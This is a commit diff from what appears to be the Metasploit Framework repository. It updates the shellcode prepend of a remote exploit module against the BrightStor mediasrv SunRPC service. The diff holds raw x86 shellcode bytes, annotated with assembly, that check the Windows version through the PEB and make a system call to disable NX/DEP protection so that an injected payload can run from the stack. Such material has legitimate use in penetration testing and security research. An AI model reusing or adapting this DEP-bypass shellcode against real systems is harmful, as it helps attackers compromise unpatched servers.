Updated prepend from topo
git-svn-id: file:///home/svn/framework3/trunk@4864 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
3604c87c22
commit
135e426d60
|
|
@ -32,17 +32,22 @@ class Exploits::Windows::Brightstor::MediasrvSunrpc < Msf::Exploit::Remote
|
|||
'Prepend' =>
|
||||
# Disable NX on 2k3 to upload data on the stack
|
||||
# (service crashes if the stack is switched to the heap)
|
||||
"\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
|
||||
"\x80\x39\x02" + # cmp byte ptr [ecx], 2
|
||||
"\x75\x15" + # jmp after
|
||||
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
|
||||
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
|
||||
"\x6a\x04" + # push 4
|
||||
"\x51" + # push ecx
|
||||
"\x6a\x22" + # push 22
|
||||
"\x6a\xff" + # push -1
|
||||
"\x6a\xff" + # push -1 (padding)
|
||||
"\xff\x12", # call dword ptr[edx]
|
||||
"\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
|
||||
"\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
|
||||
"\x75\x30" + # jnz after
|
||||
"\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
|
||||
"\x75\x27" + # jnz after
|
||||
"\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
|
||||
"\x76\x1b" + # jbe after
|
||||
"\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
|
||||
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
|
||||
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
|
||||
"\x6a\x04" + # push 4
|
||||
"\x51" + # push ecx
|
||||
"\x6a\x22" + # push 22
|
||||
"\x6a\xff" + # push -1
|
||||
"\x6a\xff" + # push -1 (padding)
|
||||
"\xff\x12", # call dword ptr[edx]
|
||||
'StackAdjustment' => -10000,
|
||||
|
||||
},
|
||||
|
|
|
|||
Loading…
Reference in New Issue